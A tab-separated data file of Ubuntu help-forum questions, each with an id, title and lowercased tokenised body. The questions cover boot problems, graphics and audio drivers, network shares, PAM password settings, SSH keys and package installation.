113576	services not started during boot	ubuntu 10.04.4 server/no gui the computer is hanging somewhere during the boot . i am never presented with a login prompt on tty1 . i can hit alt+f2 and login ( or ssh in ) and everything seems fine , but none of my services have been started ( e.g. , apache2 ) . alt+f1 is a blank screen . i can start the services manually . nothing in the logs jumps out at me , but perhaps i 'm not looking in the right spot . here is the entire boot.log : fsck from util-linux-ng 2.17.2 fsck from util-linux-ng 2.17.2 /dev/sda1 : clean , 142934/11714560 files , 12045212/46848768 blocks /dev/sdb1 : recovering journal /dev/sdb1 : clean , 12620/61054976 files , 4555959/244190000 blocks init : ureadahead-other main process ( 1064 ) terminated with status 4 * starting apparmor profiles [ ok ] * setting sensors limits [ ok ] i have 3 available kernels from the grub boot menu and all have the same issue . i booted the latest ( 2.6.32-39-server ) -- verbose , and nothing jumped out at me . can anyone tell me where i should be looking or have any theories ? thanks !
113577	prints from a pdf are completely black	i think it 's the pdf itself that does it . the printer prints testpages ok , and printing the same file from mac os x gives the same result . printed from evince and safari respectively . the pdf was created using posterazor
113581	can not load kernel object file adadio.ko	we are running ubuntu 2.6.31-11 . the computer was running a program to read from an analog-to-digital conversion board called the adadio by general standards corp . the windows environment was acting sporadically so we reset the platform . after rebooting the computer , we could no longer run the file that reads from the adadio board . the error message `` can not load adadio.ko '' is displayed . we replaced the adadio driver board ; so , we believe this is a software issue / operating system issue associated with a forced reset . can someone help ?
113584	primary hdd not visible on installation of ubuntu	i recently tried to install ubuntu on my mac , and all went well until i tried to boot up again . it only shows the one hardrive ( windows ) and the primary hardrive ( macintosh hd ) will not show up when i boot and press alt . the drive is perfectly visible in ubuntu itself , just not visible when booting up . any ideas what the issue is and how i resolve this ?
113585	need help with my dell dimension 5000 installing ubuntu !	i 'm really impressed with ubuntu i installed it on my sisters laptop trying to fix a broken partition and im surprised that its so fast ! however i decided that i would install it on my broken desktop and i keep trying to install it however it 's just stuck on the purple screen with the 5 red glowing balls and the ubuntu logo not moving anywhere ! please help ! it 's a dell dimension 5000 !
113588	install from persistent liveusb , including files / changes on casper-rw	i made a persistent liveusb drive that i 've used for a while now , and i would like to install that liveusb environment to the harddrive of a computer . i 've tried simply installing it using the default method ( ubiquity ) , but it did not install any of the programs / files / settings that are stored on my casper-rw partition . is there an easy way to install the full persistent environment from a liveusb drive onto a harddisk ? thanks !
113590	musicbrainz picard not saving new tags	i 'm having an issue getting picard to save updated tags . i swear it 's been working before but is now just failing silently . i add a folder of music to the unmatched files list , cluster it , scan it and it finds the corresponding metadata in musicbrainz . the album name is wrong so i choose to save . the green bars change to ticks implying that it 's finished . however , the tags are n't being updated . not only does banshee not see the updated tags but if i use the audio tab in nautilus the old album title is there . i tried launching picard from the command line to see if there was any useful debug logging but there 's nothing . the obvious culprit of no write access is n't to blame as the files are owned by my user and i have r+w on them . edit found the -d flag for picard 's debug log . nothing helpful , it just says it saved the file . has anyone seen this before or have any ideas about other things to try ?
113594	adding 'tap zones ' to synaptics touch pad ?	in windows i can configure the corners of my touchpad to act as another button or control . for example , i use the top left as a `` middle click '' and the bottom left as `` mute '' . i have searched around and unable to find out if this is possible on ubuntu 11.10 . my touchpad is recognised as a touchpad because i can configure the settings separately from the mouse settings .
113602	add dead region touchpad	is there a way to set a region of my touch pad as `` dead '' ignoring touch input ? the reason for this is that i have a macbook pro late 2011 and there the `` button '' is on the touch page itself . anyone got any ideas ? : d
113604	how to run virtualbox on bridged and host-only networks ?	i wish to run virtualbox with my ubuntu laptop on the home network ( so the desktop pc can access it through the router ) and also be able to ssh into the virtualbox from host on the go ( different network or with no internet ) . previously , the only network adapter on the vb instance was a 'bridged connection ' adapter . this allowed me to access the internet on the guest vb and for the other computers on the lan + host to access it . however , whenever i took my laptop off the network , i could no longer access the guest from host . i read that i needed to enable a host-only adapter to access it off the network and a nat adapter is used to access the internet from guest . my question is can i run a host-only adapter + a nat adapter alongside a bridged network adapter in virtualbox ? i am confused what i would put inside /etc/hosts ? would i put both ip 's ( host-only and bridged ) with the same servername in /etc/hosts ?
113605	how do i restore an accidentally deleted initrd image ?	i accidentally deleted the initrd image on my system . how do i restore it ?
113606	how do i revoke the default snakeoil certificate ?	windows xp keeps using the snakeoil certificate that ubuntu shipped with , despite the fact that it has never been used in any virtual host ever . the certificate is located at /etc/ssl/certs/ssl-cert-snakeoil.pem i 'm not sure where the key is . the only one i see that seems plausible is at /etc/ssl/private/ssl-cert-snakeoil.key i think the ca certificat is at /etc/ssl/certs/ca-certificates.crt but i 'm just not sure . so far i 've tried various openssl commands , such as openssl ca -keyfile /etc/ssl/private/ssl-cert-snakeoil.key \ -revoke /etc/ssl/certs/ssl-cert-snakeoil.pem \ -cert /etc/ssl/certs/ca-certificates.crt the output from that one was using configuration from /usr/lib/ssl/openssl.cnf ca certificate and ca private key do not match 14805 : error:0b080074 : x509 certificate routines : x509_check_private_key : key values mismatch : x509_cmp.c:406 : i 'm all out of ideas . any help is greatly appreciated . edit here is what happened : i bought a certificate from geotrust , installed it , activated the new virtualhost using that certificate , and restarted apache2 . at no point in the lifetime of this server has any other certificate ever been used to secure web traffic , let alone the snakeoil certificate . windows vista and up , as well as osx and all linux distributions that i 've tested use the correct certificate . windows xp uses the snakeoil certificate ( in ie . no other browsers on that vm ) . here are some screenshots :
113612	ca n't register for addons or plugins	i have gimp 2.6 i would like to add plugins to my program . i went to gimp plugin registry . i entered all the information requested . i spent at least half an hour of frustration trying to persuade the website to accept my email address . no matter what i do , i 'm told that my email address is invalid . more frustration : the page tells me to contact gimp for help . there 's no provision ( that i can see ) to make contact . i 'm at a complete standstill and am hoping you can point me in the right direction . liam kincaid
113614	version of java not matching up	i installed sun java jre 6 from the source . according to the icon under the applications menu , it is called `` sun java 6 '' . yet , the java -version command yields : java version `` 1.5.0 '' gij ( gnu libgcj ) version 4.5.4 first off , why is java not 1.6 ? also , what is gij ?
113626	turning on desktop cube removes task bars	i am knew to ubuntu and i tried to go about customizing mine with the desktop cube and all that with the wobble windows . the wobble windows i had know problem with , then i tried to change the desktop wall to the desktop cube and it removed both of my task bar . all i had left was two other window i had up ( ubuntu software , home folder ) . compizconfig settings manger disappeared after i tried to change it back . i had to press ( cont-alt-delete ) and get in to the guest addition and erase the user and make another one because my dash bar was unaccessable .
113630	system monitor is reporting 3.9 gib only ?	my ubuntu 10.10 x64 was installed on this box one year ago , with 6gb of ram . recently i 've noticed that system monitor reports just 3.9gib for memory . that ca n't possibly be right ( in windows i 'm having access to the full 6gb of ram on the same machine ) any idea what might be happening ? edit uname -m x86_64 free -m total used free shared buffers cached mem : 3954 1802 2151 0 53 1014 -/+ buffers/cache : 735 3219 swap : 5721 0 5721
113643	enabling passphrase on an already existing private key	i already have a ssh private key without a passphrase . as i have started to use it to login to a few critical and secure systems , i need to use a passphrase on my rsa private key . how can i enable passphrase on an already existing private key ? also i want to know how to backup the private kay before i enable passphrase , incase i mess up or forget the passphrase ( only for some days untill i can commit the passphrase to my memory ) .
113644	batch download of pictures from flickr ?	is there any command-line tool that can be run regularly to do a batch download of recent pictures from a flickr account photostream album in ubuntu 11.10 ? i configured flickcurl , but i ca n't find a command which can do something like download photos from last 7 days .
113645	best laptop for ubuntu and visualstudio	i am unsatisfied windows user moved to ubuntu . i like ubuntu a lot and at the same time i am a .net developer who needs to use visual studio and a couple of windows coupled applications like itunes . can some one suggest a good laptop ? thank in advance .
113650	windows users unable to access samba share of an external drive	it does n't seem that many others have had this problem so i thought i 'd ask here . have a server running ubuntu with 1 internal and 1 external drive . have a folder shared with samba on the internal drive that can be accessed , however , when sharing the entire external or just a folder on it i get the `` you do not have permission to access '' error on the windows clients . when sharing on ubuntu i go to properties , share and then tick share , allow others to write as well as guest access . clicking create share then says it will have to set the permissions and i let it . it 's not accessible . when trying to set permissions manually in the permissions tab it does n't let me choose anything , when choosing read and write for `` other '' users it reverts back to nothing as soon as it 's chosen . i 've tried creating a symlink from the mount point to within the home directory and sharing that , even getting chmod to change the permissions so they 're viewable in ls -la , but it still is n't accessible . is there something really simple i 'm missing here like externals not being easily shared ? thinking i might have to crack it open and stuff it inside the server . oh and the external is ntfs , if that would make a difference .
113651	how to open and run terminal and install driver for broadcom 802.g wireleiss	i 'm new to ubuntu and ca n't find a way to just open and execute the driver . i tried to download the driver , had to use windows to download and then transfer it to a usb drive , then i right clicked on the file , went to properties and allowed it to be executed as a program . the check mark disappeared as soon as i hit the box , and the file i noticed , was marked read only . i tried read and write , but that did n't work either . what do i do now ? btw , i do not know how to run terminal , or even what that is , i am that new , and i 'm stuck , switching back and forth between windows and ubuntu . help !
113657	keyboard not working at grub	my keyboard is not working when i get to the grub screen my keyboard seems to disable and i 'm unable to make a selectuon but if i enter the bios it works fine i have a logitech . wireless keyboard
113659	when will my application be available in ubuntu software center after publishing ?	i published my commercial software in ubuntu software center already , the status has changed to 'published ' , but when i updated my software catalog by apt-get update , and tried to search for my application , i got no record found . am i wrong here ? update it 's here
113669	active window title in kubuntu panel ?	i have kubuntu 11.10 and have seen some people 's desktops and they have the active window 's title on their top panel like unity and macs do . i 'm not looking for a global menu , they already have a widget for that preinstalled , i just want the title of the window ( i.e . google chrome ) to appear when it 's open . i 'm pretty sure it 's a widget they have but i do n't know what . anyone know what i 'm talking about ?
113675	software center install name to package installed without diffing dpkg output	something i ran across in the wee hours of the morning this morning was that the software center samba package differs from the samba apt-get package . how do you in a direct way ( as in from software center or some other direct method ... not pre-install post-install package list diff-ing ) determine what package/pseudo-package a software center line item pulls in ?
113682	how to change/disable password complexity test when changing password ?	i know that it is a `` bad '' idea , i know that it is not secure , i know . i searched the net for an answer and all i saw was whining that it 's not good . but i like using linux because it lets me make the system i want and like to use . the end of intro . i try to change password : ruslan : ~ % passwd changing password for ruslan . ( current ) unix password : enter new unix password : retype new unix password : you must choose a longer password if i try sudo passwd ruslan then i can set any password i want so i do n't need password complexity checks for passwd on my system . after googling i 've found that there should be pam module pam_cracklib that tests password for complexity and it can be configured . but my pam password settings does n't include pam_cracklib : % cat /etc/pam.d/passwd | grep '^ [ ^ # ] ' @ include common-password % cat /etc/pam.d/common-password | grep '^ [ ^ # ] ' password [ success=1 default=ignore ] pam_unix.so obscure sha512 password requisite pam_deny.so password required pam_permit.so password optional pam_gnome_keyring.so i guess that pam_unix makes this test ... oops ... guys , the moment i finished to write this sentence i 've got an enlightenment and typed man pam_unix in terminal where i 've found needed options for pam_unix module . i just removed option obscure and added minlen=1 and now i 'm happy . so now i have this line in /etc/pam.d/common-password : password [ success=1 default=ignore ] pam_unix.so minlen=1 sha512 and i can set any password i want . i decided to keep this post for people who might need this solution also . sorry and thanks .
113684	unable to install softwares from ubuntu software centre and unable to update through update manager in ubuntu11.04	when i try to install any sofware from software center it completes downloading but shows an error like bellow while installing . what should i do ? error message : installarchives ( ) failed : perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory preconfiguring packages ... perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory preconfiguring packages ... perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory preconfiguring packages ... ( reading database ... ( reading database ... 5 % % ( reading database ... 10 % % ( reading database ... 15 % % ( reading database ... 20 % % ( reading database ... 25 % % ( reading database ... 30 % % ( reading database ... 35 % % ( reading database ... 40 % % ( reading database ... 45 % % ( reading database ... 50 % % ( reading database ... 55 % % dpkg : unrecoverable fatal error , aborting : reading files list for package 'gstreamer0.10-plugins-bad ' : input/output error
113686	ubuntu 11.10 wo n't detect drivers for intel hd graphics 3000	from what i read , ubuntu 11.10 should just pick up and install the drivers . but it 's not , under the graphics section of system info it just says `` driver unknown '' . any ideas on how to resolve this ?
113688	good gameboy advance emulator ?	is there any good gameboy advance emulator for ubuntu which supports loading gameshark or action replay saves ?
113690	ca n't edit files in eclipse/aptana ?	occasionally , eclipse/aptana grey out opened files , making them un-editable ? this has never happened to me on archlinux or windows - hence why i 'm posting here .
113691	ubuntu 11.10 and ati/amd radeon 5650	i have a laptop with freshly installed ubuntu 11.10 and ati 4200/amd radeon 5650 hybrid graphics . the problem is that i ca n't switch between integrated and discrete video while using catalyst driver ( ver 12.2 ) . catalyst tells me that i can switch on to discrete on next reboot but after that , the laptop still uses integrated video . additionally , my whole system is very slow when i 'm using the catalyst driver . how can i solve this problem ?
113692	installed ubuntu and accidently gave all the hard disk space to ubuntu	saying this , when i booted and installed ubuntu , my hard disk was whole formatted . i had plenty of pictures , videos and music on my local disk [ d ] drive and i do n't want to loose it ! ! ! now i have only one 500gb partition . please help me it can save my life ! heelp ! thanks .
113698	ugly boot ubuntu 11.10 with nvidia graphics card	is there a way to fix the ugly boot when using nvidia and ubuntu 11.10 ? i fixed the issues when i was using 10.10 but 11.10 the same fix just trashes the system . thanks
113699	not able to execute a compiled file - `` permission denied ''	i 've compiled my file using the following command gcc -o rget rget.c filerpc_clnt.c filerpc_xdr.c -insl i find that the file property `` allow files to be executed as program '' is not enabled . and so when i tried to execute i 'm getting the permission denied message ./rget localhost mytestfile.txt bash : ./rget : permission denied
113704	make pulseaudio prefer external audio device	i have a bose soundlink external audio device , which i use to stream music from my computer to my stereo . ubuntu recognizes the device , but does not automatically use it . in order to get pulseaudio to use it for output , i have to manually choose it in the 'output ' tab in 'sound settings ' . i would like pulseaudio to always prefer an external device over the internal , if one is available . is there a way to accomplish this ?
113709	allow android device to access ubuntu 11.10 machine on lan	how can i allow a port on an ubuntu 11.10 machine that is on an ethernet lan to be accessed by my android device via wifi on the same lan ? specifically , i 'm doing some android app development where the app needs to access a port on the ubuntu machine ( http : //192.x.x.x : port ) and the android app responds : failure : connection to http : //192.x ... refused i am using the lan address 192.x ... as displayed by ifconfig on the ubuntu machine . thanks .
113710	how can i have my ubuntu completely in japanese ( plus the standard typing ) ?	hez so my question is : i want my ubuntu to be completely japanese . when i installed it , i have chosen japanese as the default language.. ( it is in a virtual box , btw ) . so now everything is japanese , no problem , the only thing is that i ca n't type japanese ... yes , i have read similar questions like `` how to type japanese '' , but i do n't want to type using lots of key combinations like ctrl+f6 or other stuff ( i 'm not a pro of course , i simply do n't know what would happen if i did this ^^ ) , but with the standard typing method ( sorry i do n't know it 's name ) . any ideas on how to do that ? i have already searched a lot on the internet and i have asked a relative of mine , who is an expert , and we did n't get it .
113711	`` installing '' programs	this is problem i encounter many times . sometimes when i download programs , they are in zip/tar.gz or any other extension . i simply extract them and click on bin . everything is working fine , but i want a program to be visible in unity search , be able to run it from terminal as `` programname '' and everything else i can do with programs installed from repository . i do n't want to edit bashrc , i believe it has to do something with links . how to achieve that ?
113716	alc889 - ga-p55-ud4 -no sound - ubuntu 11.10	i have computer with a gigabyte p55a-ud4 motherboard . i have on-board audio - realtek alc889 . i am using ubuntu 11.10 and have no sound . please please heeeelp : ) . i have tryed to install high definition audio codecs from realtek but it does n't work . in bios the azalia codec is turned on . ps : sorry for my english . 00:00.0 host bridge : intel corporation core processor dram controller ( rev 12 ) 00:01.0 pci bridge : intel corporation core processor pci express x16 root port ( rev 12 ) 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb universal host controller ( rev 06 ) 00:1a.1 usb controller : intel corporation 5 series/3400 series chipset usb universal host controller ( rev 06 ) 00:1a.2 usb controller : intel corporation 5 series/3400 series chipset usb universal host controller ( rev 06 ) 00:1a.7 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 06 ) 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 06 ) 00:1c.4 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 5 ( rev 06 ) 00:1c.5 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 6 ( rev 06 ) 00:1c.6 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 7 ( rev 06 ) 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb universal host controller ( rev 06 ) 00:1d.1 usb controller : intel corporation 5 series/3400 series chipset usb universal host controller ( rev 06 ) 00:1d.2 usb controller : intel corporation 5 series/3400 series chipset usb universal host controller ( rev 06 ) 00:1d.3 usb controller : intel corporation 5 series/3400 series chipset usb universal host controller ( rev 06 ) 00:1d.7 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) 00:1e.0 pci bridge : intel corporation 82801 pci bridge ( rev a6 ) 00:1f.0 isa bridge : intel corporation 5 series chipset lpc interface controller ( rev 06 ) 00:1f.2 sata controller : intel corporation 5 series/3400 series chipset 6 port sata ahci controller ( rev 06 ) 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 06 ) 01:00.0 vga compatible controller : nvidia corporation gt216 [ geforce gt 220 ] ( rev a2 ) 01:00.1 audio device : nvidia corporation high definition audio controller ( rev a1 ) 03:00.0 sata controller : jmicron technology corp. jmb362/jmb363 serial ata controller ( rev 03 ) 03:00.1 ide interface : jmicron technology corp. jmb362/jmb363 serial ata controller ( rev 03 ) 04:00.0 ide interface : marvell technology group ltd. device 91a3 ( rev 11 ) 05:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 06 ) 06:03.0 ide interface : integrated technology express , inc. it8213 ide controller 06:07.0 firewire ( ieee 1394 ) : texas instruments tsb43ab23 ieee-1394a-2000 controller ( phy/link ) 3f:00.0 host bridge : intel corporation core processor quickpath architecture generic non-core registers ( rev 02 ) 3f:00.1 host bridge : intel corporation core processor quickpath architecture system address decoder ( rev 02 ) 3f:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 02 ) 3f:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 02 ) 3f:02.2 host bridge : intel corporation core processor reserved ( rev 02 ) 3f:02.3 host bridge : intel corporation core processor reserved ( rev 02 ) aplay -l karta 0 : intel [ hda intel ] , urządzenie 0 : alc889 analog [ alc889 analog ] urządzenia podrzędne : 1/1 urządzenie podrzędne # 0 : subdevice # 0 karta 0 : intel [ hda intel ] , urządzenie 1 : alc889 digital [ alc889 digital ] urządzenia podrzędne : 1/1 urządzenie podrzędne # 0 : subdevice # 0 karta 1 : nvidia [ hda nvidia ] , urządzenie 3 : hdmi 0 [ hdmi 0 ] urządzenia podrzędne : 1/1 urządzenie podrzędne # 0 : subdevice # 0 karta 1 : nvidia [ hda nvidia ] , urządzenie 7 : hdmi 0 [ hdmi 0 ] urządzenia podrzędne : 1/1 urządzenie podrzędne # 0 : subdevice # 0 karta 1 : nvidia [ hda nvidia ] , urządzenie 8 : hdmi 0 [ hdmi 0 ] urządzenia podrzędne : 1/1 urządzenie podrzędne # 0 : subdevice # 0 karta 1 : nvidia [ hda nvidia ] , urządzenie 9 : hdmi 0 [ hdmi 0 ] urządzenia podrzędne : 1/1 urządzenie podrzędne # 0 : subdevice # 0
113717	can i close an image in gimp and have the entire program close ?	i 'm using gimp 2.6.12 . when i 'm done editing an image and want to close gimp , i have to do the process twice . the first closure will close the open image file . after that , gimp remains open but in a state of `` not open any file '' . then i must press the `` close '' or use the pull down menu to completely exit from gimp . is this normal or can i change this ?
113727	how to setup an alias for local facing interface	i 'm trying to set an alias for an interface facing local network , but when i try to bring it up i receive this error : rtnetlink answers : file exists failed to bring up eth1:0 . here is my /etc/network/interfaces # loopback device : auto lo iface lo inet loopback # device : eth0 auto eth0 iface eth0 inet static address x.x.x.x broadcast x.x.x.x netmask 255.255.255.0 gateway x.x.x.1 # device : eth1 auto eth1 iface eth1 inet static address 10.0.0.1 netmask 255.255.252.0 # device : eth1:0 auto eth1:0 iface eth1:0 inet static address 10.0.0.2 netmask 255.255.252.0 # default route to access subnet up route add -net x.x.x.x netmask 255.255.255.0 gw x.x.x.1 eth0
113728	i 've installed golang with accordance with the wiki yet `` go get '' is missing	i 've installed everything go-related from synaptic and later added ppa as described in the wiki : https : //wiki.ubuntu.com/go yet i can not do `` go get '' for example go get code.google.com/p/gorilla/mux says that go command is not found . how should i install this `` go '' command ?
113729	nonprinting characters no longer appear	i ca n't figure out how long this has been going on , but it finally started to drive me crazy : in libre office writer , absolutely nothing changes when i toggle the `` nonprinting characters '' button . ctrl f10 toggles the button on my toolbar , but also does not reveal any nonprinting characters . how do i start fixing this ?
113732	is it possible to play from google play ( music ) in rhythmbox ?	would n't it be nice to be able to access google player ( former google music ) directly from rhythembox ? nuvola player is nice but standalone player . is there a similar rhythembox plugin or any current ongoing work on such ?
113733	how do i correctly mount a ntfs partition in /etc/fstab ?	after a nasty episode ( my second , you 'd think i 'd learn ) caused by unsupervised automated podcast downloads filling my entire partition , i 've finally moved just ~/music to its own partition . the partition i 'm using was already formatted ntfs ( this is the genius part : when i got this computer three years ago , i actually set it up with a 20g music partition precisely because i 'd had this problem before , but i never actually organized myself to store music on it . so that 's my backstory . here 's what i need now : i have two partitions that i want to start mounting on startup : /dev/sda3 /mnt/devel ext4 defaults 0 2 /dev/sda2 /mnt/excess ntfs defaults 0 2 the ext4 partion mounts fine ( owned by me , writeable only by me ) , but the ntfs mounts owned by root with read and write permission for all . i 'm not sure how to fix this . is there something quirky about ntfs or did i do something elsewhere that 's causing this problem ? drwxr-xr-x 7 amanda amanda 4096 2012-03-14 19:07 devel drwxrwxrwx 1 root root 4096 2012-03-14 22:38 excess
113734	vdrift does not start	i tried to install vdrift on kubuntu 11.10 . i downloaded the source from the project 's website , installed the dependencies from packages and bullet by hand . when i try to launch vdrift , i now get that : stdout info : multi-processor system detected . run with -multithreaded argument to enable multithreading ( experimental ) . info : starting vdrift : development-full , version : exportiert , o/s : unix info : home directory : /home/mu info : settings file : /home/mu/.vdrift/vdrift.config ( does not exist , will be created ) info : data directory : /usr/local/share/games/vdrift/data data_dir : /usr/local/share/games/vdrift/data info : temporary directory : /home/mu/.vdrift/tmp info : log file : /home/mu/.vdrift/log.txt info : the last vdrift startup was unsuccessful . settings have been set to failsafe defaults . your original vdrift.config file was backed up to vdrift.config.backup info : disabling antialiasing info : display change was successful : 800x600x16 16z fullscreen=0 info : video card information : vendor : nvidia corporation renderer : geforce 9500 gt/pci/sse2 version : 3.3.0 nvidia 280.13 maximum texture size : 8192 maximum varying floats : 60 using glew 1.6.0 info : maximum color attachments : 8 info : maximum draw buffers ( 1 required ) : 8 info : disabling shaders info : sigabrt detected , releasing the mouse stderr error : failed to load /home/mu/.vdrift/vdrift.config error : unable to open graphics config file : /usr/local/share/games/vdrift/data/shaders/render.conf.noshaders error : error loading non-shader render configuration file : /usr/local/share/games/vdrift/data/shaders/render.conf.noshaders vdrift : src/graphics_fallback.cpp:646 : void graphics_fallback : :disableshaders ( const string & , std : :ostream & ) : assertion `0 ' failed . how can i get it to run ?
113736	how do i set my default music folder ?	i recently moved all my music to a separate partion , moved `` ~/music '' to `` ~/music-bak '' and sym linked a new music directory to the partition . nautilus updated the bookmarks to show `` music-bak '' under computer . how do i tell it that `` music '' is my real music folder ?
113741	soft raid and dual boot with windows 7	my motherboard support fake raid . can i dual boot ubuntu and windows 7 and both running on raid ( stripe ) ? how can i do that ?
113748	how to avoid `` apt-get '' to stuck ?	in some conditions like those : slow internet connections slow ppa or sources wifi internet access or 3g internet access apt-get may stuck during update , install , upgrade or dist-upgrade ... . endlessly ( up to you to force it to close ) when i say stuck : it downloads the files , start the download , slow down and wait at some point and simply stop to download but still waiting the end of the file . from what i understand it seems to occurs when there is a lot of latency variations ( so when a server is saturated or with a wifi/3g internet access ) this effect affects also with official repositories . so it 's not a source.list thing . how can we tell to apt-get : to stop waiting endlessly retry to download when there is a timeout or a packet loss during the download thank you very much for the help . best regards , p.d . : i am looking for a solution that does not involve brute force methods such as ctrl+c or kill . i am looking for something more compatible with scripts ( so no `` human '' intervention when the apt-get line has been launched ) .
113749	remove ubuntu and keep grub manager	here is the deal ... i have 3partitions and swap ... one big for space one windows 7 and one kubuntu . here is table : sda1 > ntfs > system reserved > 100mb sda2 > ntfs > windows7 > 40gb sda3 > extended > 260gb in sda3 > > > -- - -sda6 > swap > 2gb -sda7 > ext4 > ubuntu > 40gb -sda8 > ntfs > [ no os ] just for stuff > 220gb now what i want is to remove linux becouse i have realise that windows 7 need more space to work better and do n't use linux that mutch.i want to completely remove ubuntu , format the ubuntu and the swap partitions and then extend the windows7 partitions but the question i ask is : how to keep grub after remove the linux partition ? you may think its a stupit question but i could n't ask if it was so easy ... here is the issue i have no cd or dvd : d i 'm now running linux.. it work everythink is fine for now but how can i install grub in the big partition sda8 from my running linux without livecd ? thank you : )
113758	iso checksum menu in nautilus	i 'm using ubuntu 11.10 x64 , unity , and nautilus 3.2.1 i want to be able to perform checksum iso in nautilus . i have searched and found : http : //www.addictivetips.com/ubuntu-linux-tips/nautilus-actions-extra-add-more-features-to-ubuntu-context-menu/ and perform the procedures written in it . once completed , the other menus appear , except the menu for `` checksum verification '' . then , when i run gksu nautilus-actions-config-tool i just asked to enter a user password , and ... . nothing happens . what should i do , to bring up the `` checksum verification '' menu ? i am very grateful for any response or advice given .
113763	install eclipse without dependencies open-jdk	i have sun java 7 installed on my ubuntu 11.10 i want to install eclipse but when i try installing eclipse , it will install open-jdk as well which i do not need at all is there any way i can install eclipse without open-jdk .
113765	recovering data from private in an ecryptfs backup when the new home is also encrypted	i have a backup of /home from my old system on an external drive . the ~ on my new system has full home encryption from ecryptfs . i want to decrypt the private on the old home and copy its now-decrypted contents to the new home . i actually have the ~/.private and ~/.ecryptfs from the old system on my new system as well . i tried mounting it from there before , but it 's not possible . i 've confirmed with dustin kirkland ( ecryptfs developer ) that you ca n't have an encrypted home and an encrypted private in use at the same time . i tried mounting the backup drive over /home and running and ecryptfs-mount-private and entering my login password ( same on old system and new ) , but ~/private was n't decrypted .
113768	does the guided encrypted lvm option encrypt swap on 11.10 ?	after a bit of googling i still have n't managed to find a clear answer to this . if you use the guided encrypted lvm install option from the ubuntu 11.10 alternate cd ( i think it 's option 3 ) , does it encrypt the swap partition automatically , as well as home ? leaving only the boot loader unencrypted ? or do i have to follow the various guides for older versions of ubuntu for manually creating and encrypting swap and home partitions ? thanks a lot !
113769	how do i copy a specific number of directories with rsync ?	i have a folder say /media/movies/english/ numbers of folders , there is say 500 folder now i want to copy only 50 folders , not in alphabetical order but in random ... how to do perform this task using rsync ? i tried the following rsync command this is want happened rsync -arv -- include-from=/media/movies_ntfs/movies/english/rsync-test /home/joe/videos/ rsync-test file contains per line folders present in /media/movies_ntfs/movies/english/ folder but nothing is copied , when i ran the command . why ?
113772	how to batch convert .doc or .docx to .pdf	what is needed to batch convert a set of .doc or .docx files to .pdf in terminal , not using a gui . should this be done using a single file versus a group . i would also like to maintain as much meta-data as possible
113779	x server can not start after executing sudo nvidia-xconfig and sudo reboot ( nvidia geforce gt 630m )	os : ubuntu desktop 11.10 video card : nvidia geforce gt 630m i executed the following commands to install driver of the video card : sudo apt-get install nvidia-current reboot the system run navidia x server settings , it says you do not appear to be using the nvidia x driver . please edit your x configuration file ( just run nvidia-xconfig as root ) , and restart the x server . sudo nvidia-xconfig reboot the system a file named xorg.config will be generated at /etc/x11 ; but after i executed step 4 , the system hangs in somewhere and the x server can not start . i pressed ctrl + alt + f1 and removed the file /etc/x11/xorg.config and reboot ; the x server can start and work correctly . but still navidia x server settings still prompt information in step 3 .
113781	fingerprint reader on the t60 thinkpad running 10.10	how do i get my fingerprint reader working on my t60 thinkpad running ubuntu 10.10 . there seems to many ideas out there but i am not sure what to do to get it working for logins . thanks jim w .
113783	how do i move the unity2d launcher to the right ?	i understand the 3d launcher can not be moved to the right . can the unity2d launcher be moved ?
113788	how can i change my launcher location on the screen ( left , right , bottom , top ) ?	i want to change where my launcher location is on the screen is . do i have to install an application like myunity or can i just do it though the command line ? i 'm using ubuntu 12.04 beta 1 for the record .
113790	remove all newtork connection information list	i am using ubuntu 11.10 , and i am accessing internet from mobile internet.. so i have various connection mention in the list.. and how can i remove that list of connection form the network list and below is the image where i got an bash error and i have upload a new image where all list of connections are stored
113792	ubuntu 12.04 dual monitor config problem	i am using dual monitors with my laptop . i used nvidia 's configuration tool ( nvidia-xconfig ) to detect the second monitor ( via hdmi ) and setup twinview , no problems . now , if i try to boot up without that monitor , i 'm having a strange issue . on boot , everything is normal . then , i get an error on the left side of the screen saying checks failed for a large variety of screen resolutions and frequencies . in addition , my mouse only moves in a small column on the left side of the screen , and clicks are registered , quite strangely , on the right side of the screen . i ca n't click on unity at all . however , the keyboard works , so i can get into the terminal with the windows key . i tried getting into nvidia-xconfig , but the gui did not come up . i tried to manually edit /etc/x11/xorg.conf , but i do n't know what to change . does anyone know of a way i can reset my display settings through the command line or through manually editing xorg.conf ? thanks !
